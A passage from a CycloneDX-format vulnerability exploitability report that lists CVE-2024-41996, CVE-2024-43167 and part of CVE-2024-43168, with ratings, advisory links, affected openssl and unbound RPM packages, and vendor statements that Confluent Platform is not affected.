          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2024-41996",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-41996"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-41996"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://dheatattack.gitlab.io/details/"
        },
        {
          "url": "https://dheatattack.gitlab.io/faq/"
        },
        {
          "url": "https://gist.github.com/c0r0n3r/abccc14d4d96c0442f3a77fa5ca255d1"
        },
        {
          "url": "https://github.com/openssl/openssl/issues/17374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41996"
        },
        {
          "url": "https://openssl-library.org/post/2022-10-21-tls-groups-configuration/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
        }
      ],
      "published": "2024-08-26T06:15:04+00:00",
      "updated": "2026-06-17T07:48:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-43167",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "DISPUTE NOTE: this issue does not pose a security risk as it (according to analysis by the original software developer, NLnet Labs) falls within the expected functionality and security controls of the application. Red Hat has made a claim that there is a security risk within Red Hat products. NLnet Labs has no further information about the claim, and suggests that affected Red Hat customers refer to available Red Hat documentation or support channels. ORIGINAL DESCRIPTION: A NULL pointer dereference flaw was found in the ub_ctx_set_fwd function in Unbound. This issue could allow an attacker who can invoke specific sequences of API calls to cause a segmentation fault. When certain API functions such as ub_ctx_set_fwd and ub_ctx_resolvconf are called in a particular order, the program attempts to read from a NULL pointer, leading to a crash. This issue can result in a denial of service by causing the application to terminate unexpectedly.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-43167"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/08/16/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-43167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303456"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/issues/1072"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1073"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1073/files"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00046.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43167"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6998-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-43167"
        }
      ],
      "published": "2024-08-12T13:38:35+00:00",
      "updated": "2026-06-17T07:50:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-43168",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
